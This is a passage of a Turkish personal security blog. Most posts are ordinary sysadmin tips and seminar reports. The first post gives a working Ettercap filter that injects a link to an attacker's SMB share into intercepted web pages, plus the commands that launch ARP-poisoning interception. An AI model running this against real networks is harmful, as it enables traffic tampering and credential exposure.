14 Eylül 2013 Cumartesi

Ettercap ile HTTP Trafiğinde Bul Değiştir

Mitm gibi ağ trafiğini araya girerek izlemeye başladığınız durumlarda ettercap aracını kullanarak trafiği değiştirmeniz mümkün olabilir. Tabii benim gibi her lazım olduğunda "bunu nasıl yapıyorduk" diye söylenmiyorsanız..  Bu sefer üşenmiyorum buraya yazıyorum ve bir sonraki lazım oluşunda burada bulmayı umut ediyorum :)

Trafiğini üzerimize aldığımız istemcinin ziyaret ettiği web sayfasında küçük bir değişiklik yapmak istediğimizi varsayalım. Ben sayfaya yeni bir css bağlantısı eklemek istiyorum.. :) Bunun için şöyle bir filtre dosyası hazırlayalım...

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "gzip")) {
  replace("gzip", " ");
  msg("whited out gzip\n");
 }
}

if (ip.proto == TCP && tcp.dst == 80) {
 if (search(DATA.data, "deflate")) {
  replace("deflate", " "); 
  msg("whited out deflate\n");
 }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("<head>", "<head><link rel=\"stylesheet\" href=\"\\\\192.168.1.102\\share\\style.css\" type=\"text/css\" media=\"all\">");
   replace("<HEAD>", "<HEAD><link rel=\"stylesheet\" href=\"\\\\192.168.1.102\\share\\style.css\" type=\"text/css\" media=\"all\">");
   msg("Filter Ran.\n");
}
 

Bu dosya web sayfası içeriğindeki <head> etiketini değiştirip sayfaya yeni bir css dosyası linki ekleyecektir... Ben css ekledim :) Gerisi hayal gücünüze kalmış...

Bu dosyayı /usr/local/share/ettercap/etter.html_change.filter adıyla kayıt edelim... Yazdığımız filter dosyasının ettercap tarafından kullanılabilemesi için aşağıdaki gibi bir komut verelim...

etterfilter etter.html_change.filter -o etter.html_change.filter


Bu aşamadan sonra aşağıdaki komutla ettercap'i ateşleyelim ve mitm saldırımızı başlatalım...

ettercap -i eth0 -T -q -F etter.html_change -M ARP // //


Zehirlenen ve trafiği üzerimizden geçmeye başlayan istemcilerin bizim bul/değiştir kuralımıza uygun şekilde değiştirilmiş web sayfalarını görmeleri gerekiyor....

30 Ağustos 2013 Cuma

Konsoldan ISO İmajı Yazmak

Konsoldan iso imajını yazdırmak için şöyle bir komut verilebilir....

wodim -sao dev='/dev/sr0' speed=4 /path/iso/hede.iso

17 Nisan 2013 Çarşamba

Uludağ Üniversitesi Semineri

Internet Haftası etkinlikleri kapsamında17 Nisan 2013 tarihinde Uludağ üniversitesi'nde "İnternet Kullanıcıları İçin Güvenlik Riskleri ve Saldırı Yöntemleri"konulu bir sunum yaptım...

İnternet kullanıcılarının karşılaşabilecekleri çeşitli saldırılardan ve bu saldırılara karşı neler yapılabileceğinden bahsetmeye, bazı saldırıları uygulamalı olarak göstermeye çalıştım... Finalde ise bir sürprizle semineri tamamladık :D


Umarım faydalı bir seminer olmuştur :)

11 Şubat 2013 Pazartesi

FreeBSD için Python MySQLdb Kurulumu

Python üzerinden MySQL sunucuna bağlanmak için ihtiyaç duyulan MySQLdb eklentisini kurmak için FreeBSD üzerinde aşağıdaki gibi bir yol izlenebilir...

pkg_add -rv ftp://ftp2.jp.freebsd.org/pub/FreeBSD/ports/i386/packages-8.1-release/Latest/py26-MySQLdb.tbz

Kurulum tamamlanıktan sonra aşağıdaki gibi bir hata alırsanız çözümü hatanın altında gördüğünüz gibi olacaktır... :)

Traceback (most recent call last):
  File "test.py", line 24, in <module>
    import MySQLdb as sql
  File "/usr/local/lib/python2.6/site-packages/MySQLdb/__init__.py", line 19, in <module>
    import _mysql
ImportError: Shared object "libmysqlclient_r.so.16" not found, required by "_mysql.so"


Yukardaki hata için aşağıdaki gibi bir sembolik link oluşturulur...

ln -s /usr/local/lib/mysql/libmysqlclient_r.so.16 /usr/local/lib/libmysqlclient_r.so.16

Bunun dışında aşağıdaki gibi bir hata söz konusu olabilir...

/usr/local/lib/python2.6/site-packages/MySQLdb/__init__.py:34: DeprecationWarning: the sets module is deprecated
from sets import ImmutableSet

/usr/lib/python2.6/site-packages/MySQLdb/__init__.py dosyasını en sevdiğiniz metin editörüyle açıp aşağıdaki değişiklikleri yapın...

34. Satırda "from sets import ImmutableSet" ifadesini açıklama satırı yapıp bir alt satıra aşağıdaki gibi ekleme yapmanız gerekiyor...

ImmutableSet = frozenset

41. Satırda "from sets import BaseSet" ifadesini açıklama satırı yaparak bir altına aşağıdaki satırı ekleyin...

BaseSet = set

Her şey yolundaysa Python içerisinde import MySQLdb komutunu verdikten sonra MySQLdb eklentisini kullanabilirsiniz...

30 Ocak 2013 Çarşamba

Akademik Bilişim 2013

Akdeniz Üniversitesinin ev sahipliği yaptığı Akademik Bilişim kapsamında 19-20 Ocak 2013 tarihlerinde uygulamalı olarak "Özgür Yazılımlarla Saldırı Yöntemleri" konulu güvenlik eğitimi vermeye ve katılımcı arkadaşlarla bu konudaki naçizane bilgilerimi paylaşmaya çalıştım...

  • Bilgi Toplama ve Ağ Haritalama
  • Ağ Servislerine Yönelik Saldırılar
  • Yerel Ağ Saldırıları
  • Kablosuz Ağ Saldırıları
  • Sisteme Sızma Süreci
  • Güvenlik Açığı Kullanımı
  • Şifre Kırma

Ana hatlarıyla yukarıdaki konu başlıklarını kapsayan eğitim sırasında saldırganların bilgi toplamak ve ağ haritalamak için kullandıkları yöntemleri, ağ servislerine yapılabilecek saldırıları, yerel ağlar için tehdit unsuru olan MAC sahteciliği, ARP zehirleme, Ortadaki adam saldırısı, DNS zehirleme gibi saldırıları daha önceden hazırlamış olduğum test sistemleri üzerinde örneklemeye çalıştım...

Kablosuz ağ saldırılarında ise kablosuz ağların tespit edilmesi, şifresiz ağların dinlenmesi, şifreli ağlarda wep/wpa/wpa2 gibi şifrelerin özgür yazılımlar kullanılarak kırılması ve wps gibi teknolojilere ait zayıflıkların suistimal edilmesini yanımda götürmüş olduğum kendi modemim üzerinde uygulamalı olarak göstermeye gayret ettim...

Güvenlik açığı kullanımı ve şifre kırma bölümlerinde ise ağ servislerini veya istemci tarafındaki web browser zayıflıklarını suistimal ederek test sistemlerine erişim sağlamayı örneklemeye çalıştım..

Güvenlik açığı kullanılarak girilen test sistemleri üzerinden alınan Windows ve Unix parola hashlerini farklı araçlar ile nasıl kırabileceğimizi örneklerken, çevrim içi olarak Uzak Masaüstü (RDP) ve SSH gibi servislere canlı parola denesi yaparak erişim sağlamaya çalıştık...

Günlük yaşamda karşılaşabileceğimiz saldırıları test ortamında örnekleyerek sonuçlarını görmeye ve bilgi güvenliği konusunda tecrübemizi arttırmaya çalıştık...

Projeksiyon ve İnternet erişimi sorunlarının can sıktığı ilk saatler dışında oldukça keyif aldığım bir eğitim oldu. Umarım katılımcılar içinde keyifli ve verimli bir etkinlik olmuştur...

24 Ocak 2013 Perşembe günü ise "Metasploit ile Güvenlik Denetimi" konulu bir sunum yaptım. Yine kapalı bir test ortamında Metasploit araçlarını kullanarak bilgisayar sistemlerine erişim sağladığımız "kırmalı dökmeli" bir sunum gerçekleştirdim...

Ev sahibimizin neredeyse kapıları üzerimize kilitleyip gitmesine ramak kala biraz uzatmış olduğum sunumu bitirerek henüz kilitlenmemiş olan arka kapıdan kendimizi dışarı atmayı başardık... :)

15 Ocak 2013 Salı

Ubuntu 12.10 Denetim Düğmelerini Sağa Kaydırmak

Ubuntu 12.10 sürümünde denetim düğmelerini sağa kaydırmak için aşağıdaki komutu kullanabilirsiniz...

gsettings set org.gnome.desktop.wm.preferences button-layout ':minimize,maximize,close' 

3 Ocak 2013 Perşembe

Uşak Semineri

14 Aralık 2012 tarihinde Uşak Üniversitesinde çoğunluğunu öğrenci arkadaşlarımızın oluşturduğu elit bir toplulukla buluştuk. "Hacker Kültürü ve Etik Hacker" konulu sunumun ilk kısmında bilgi güvenliği alanında kariyer yapmak isteyen arkadaşlara yol göstermeye, fikir vermeye çalıştık...

İkinci bölümde ise uygulamalı olarak çeşitli saldırı yöntemlerini göstermeye ve bilgi güvenliği farkındalığı oluşturmaya gayret ettik...

Kamuya kapalı olan özel oturumda ise Uşak Bilişim Suçları Personeli ile fikir alışverişinde bulunduk...

 Başta Uşak Üniversitesi Öğretim Görevlileri; Utku Köse, Durmuş Koç, Süleyman Anıl Yücesoy Hocalarımıza, etkinlikte emeği geçen ve bizi dinlemeye gelen herkese teşekkür ediyoruz...